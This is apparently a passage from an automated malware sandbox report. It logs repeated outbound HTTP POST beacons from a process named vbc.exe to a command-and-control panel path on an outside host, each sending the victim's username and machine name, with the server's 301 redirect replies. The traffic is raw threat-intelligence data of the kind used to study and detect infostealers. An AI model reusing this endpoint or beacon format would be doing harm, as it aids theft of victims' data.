                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></b
                                  Dec 22, 2024 14:13:48.702883959 CET12INData Raw: 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: ody></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  51192.168.2.54996492.113.16.67803292C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 22, 2024 14:13:48.962547064 CET257OUTPOST /okoye/Panel/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: publicspeaking.co.id
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: C84394D2
                                  Content-Length: 153
                                  Connection: close
                                  Dec 22, 2024 14:13:49.082293034 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                  Data Ascii: (ckav.rualfons965543ALFONS-PC0FDD42EE188E931437F4FBE2C
                                  Dec 22, 2024 14:13:50.576571941 CET1236INHTTP/1.1 301 Moved Permanently
                                  Date: Sun, 22 Dec 2024 13:13:50 GMT
                                  Content-Type: text/html
                                  Content-Length: 795
                                  Connection: close
                                  location: https://publicspeaking.co.id/okoye/Panel/five/fre.php
                                  platform: hostinger
                                  panel: hpanel
                                  content-security-policy: upgrade-insecure-requests
                                  Server: hcdn
                                  alt-svc: h3=":443"; ma=86400
                                  x-hcdn-request-id: b62d411e1999395f4530a6becbcd5b88-fra-edge1
                                  x-hcdn-cache-status: DYNAMIC
                                  x-hcdn-upstream-rt: 0.354
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></b
                                  Dec 22, 2024 14:13:50.576713085 CET12INData Raw: 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: ody></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  52192.168.2.54997092.113.16.67803292C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 22, 2024 14:13:50.855422974 CET257OUTPOST /okoye/Panel/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: publicspeaking.co.id
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: C84394D2
                                  Content-Length: 153
                                  Connection: close
                                  Dec 22, 2024 14:13:50.975179911 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                  Data Ascii: (ckav.rualfons965543ALFONS-PC0FDD42EE188E931437F4FBE2C
                                  Dec 22, 2024 14:13:52.558160067 CET1236INHTTP/1.1 301 Moved Permanently
                                  Date: Sun, 22 Dec 2024 13:13:52 GMT
                                  Content-Type: text/html
                                  Content-Length: 795
                                  Connection: close
                                  location: https://publicspeaking.co.id/okoye/Panel/five/fre.php
                                  platform: hostinger
                                  panel: hpanel
                                  content-security-policy: upgrade-insecure-requests
                                  Server: hcdn
                                  alt-svc: h3=":443"; ma=86400
                                  x-hcdn-request-id: acde96df6dad3e00d01ba6c193eb3787-fra-edge1
                                  x-hcdn-cache-status: DYNAMIC
                                  x-hcdn-upstream-rt: 0.354
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></b
                                  Dec 22, 2024 14:13:52.558290005 CET12INData Raw: 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: ody></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  53192.168.2.54997692.113.16.67803292C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 22, 2024 14:13:52.822540045 CET257OUTPOST /okoye/Panel/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: publicspeaking.co.id
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: C84394D2
                                  Content-Length: 153
                                  Connection: close
                                  Dec 22, 2024 14:13:52.942630053 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                  Data Ascii: (ckav.rualfons965543ALFONS-PC0FDD42EE188E931437F4FBE2C
                                  Dec 22, 2024 14:13:54.531948090 CET1236INHTTP/1.1 301 Moved Permanently
                                  Date: Sun, 22 Dec 2024 13:13:54 GMT
                                  Content-Type: text/html
                                  Content-Length: 795
                                  Connection: close
                                  location: https://publicspeaking.co.id/okoye/Panel/five/fre.php
                                  platform: hostinger
                                  panel: hpanel
                                  content-security-policy: upgrade-insecure-requests
                                  Server: hcdn
                                  alt-svc: h3=":443"; ma=86400
                                  x-hcdn-request-id: 643de5bbbeb043b60b9b96122164f0c0-fra-edge1
                                  x-hcdn-cache-status: DYNAMIC
                                  x-hcdn-upstream-rt: 0.363
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></b
                                  Dec 22, 2024 14:13:54.532008886 CET12INData Raw: 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: ody></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  54192.168.2.54998292.113.16.67803292C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 22, 2024 14:13:55.087287903 CET257OUTPOST /okoye/Panel/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: publicspeaking.co.id
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: C84394D2
                                  Content-Length: 153
                                  Connection: close
                                  Dec 22, 2024 14:13:55.208168983 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                  Data Ascii: (ckav.rualfons965543ALFONS-PC0FDD42EE188E931437F4FBE2C
                                  Dec 22, 2024 14:13:56.719813108 CET1236INHTTP/1.1 301 Moved Permanently
                                  Date: Sun, 22 Dec 2024 13:13:56 GMT
                                  Content-Type: text/html
                                  Content-Length: 795
                                  Connection: close
                                  location: https://publicspeaking.co.id/okoye/Panel/five/fre.php
                                  platform: hostinger
                                  panel: hpanel
                                  content-security-policy: upgrade-insecure-requests
                                  Server: hcdn
                                  alt-svc: h3=":443"; ma=86400
                                  x-hcdn-request-id: 0dda898d785fe910987b478eaf8df721-fra-edge2
                                  x-hcdn-cache-status: DYNAMIC
                                  x-hcdn-upstream-rt: 0.379
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></b
                                  Dec 22, 2024 14:13:56.719855070 CET12INData Raw: 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: ody></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  55192.168.2.54998892.113.16.67803292C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 22, 2024 14:13:56.995337963 CET257OUTPOST /okoye/Panel/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: publicspeaking.co.id
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: C84394D2
                                  Content-Length: 153
                                  Connection: close
                                  Dec 22, 2024 14:13:57.115154028 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                  Data Ascii: (ckav.rualfons965543ALFONS-PC0FDD42EE188E931437F4FBE2C
                                  Dec 22, 2024 14:13:58.700980902 CET1236INHTTP/1.1 301 Moved Permanently
                                  Date: Sun, 22 Dec 2024 13:13:58 GMT
                                  Content-Type: text/html
                                  Content-Length: 795
                                  Connection: close
                                  location: https://publicspeaking.co.id/okoye/Panel/five/fre.php
                                  platform: hostinger
                                  panel: hpanel
                                  content-security-policy: upgrade-insecure-requests
                                  Server: hcdn
                                  alt-svc: h3=":443"; ma=86400
                                  x-hcdn-request-id: 683437dca3eb09ab8f411b176e1fa5f3-fra-edge2
                                  x-hcdn-cache-status: DYNAMIC
                                  x-hcdn-upstream-rt: 0.361
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></b
                                  Dec 22, 2024 14:13:58.701054096 CET12INData Raw: 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: ody></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  56192.168.2.54999392.113.16.67803292C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 22, 2024 14:13:58.958937883 CET257OUTPOST /okoye/Panel/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: publicspeaking.co.id
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: C84394D2
                                  Content-Length: 153
                                  Connection: close
                                  Dec 22, 2024 14:13:59.078912973 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                  Data Ascii: (ckav.rualfons965543ALFONS-PC0FDD42EE188E931437F4FBE2C
                                  Dec 22, 2024 14:14:00.640110016 CET1236INHTTP/1.1 301 Moved Permanently
                                  Date: Sun, 22 Dec 2024 13:14:00 GMT
                                  Content-Type: text/html
                                  Content-Length: 795
                                  Connection: close
                                  location: https://publicspeaking.co.id/okoye/Panel/five/fre.php
                                  platform: hostinger
                                  panel: hpanel
                                  content-security-policy: upgrade-insecure-requests
                                  Server: hcdn
                                  alt-svc: h3=":443"; ma=86400
                                  x-hcdn-request-id: ce527a0a6fa8be9b0c6d8b5fb7dc2abf-fra-edge1
                                  x-hcdn-cache-status: DYNAMIC
                                  x-hcdn-upstream-rt: 0.335
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></b
                                  Dec 22, 2024 14:14:00.640153885 CET12INData Raw: 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: ody></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  57192.168.2.54999892.113.16.67803292C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 22, 2024 14:14:00.915138960 CET257OUTPOST /okoye/Panel/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: publicspeaking.co.id
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: C84394D2
                                  Content-Length: 153
                                  Connection: close
                                  Dec 22, 2024 14:14:01.034852028 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                  Data Ascii: (ckav.rualfons965543ALFONS-PC0FDD42EE188E931437F4FBE2C
                                  Dec 22, 2024 14:14:02.599672079 CET1236INHTTP/1.1 301 Moved Permanently
                                  Date: Sun, 22 Dec 2024 13:14:02 GMT
                                  Content-Type: text/html
                                  Content-Length: 795
                                  Connection: close
                                  location: https://publicspeaking.co.id/okoye/Panel/five/fre.php
                                  platform: hostinger
                                  panel: hpanel
                                  content-security-policy: upgrade-insecure-requests
                                  Server: hcdn
                                  alt-svc: h3=":443"; ma=86400
                                  x-hcdn-request-id: e775a8f60f9ffbf81dc9973745cd7e47-fra-edge2
                                  x-hcdn-cache-status: DYNAMIC
                                  x-hcdn-upstream-rt: 0.339
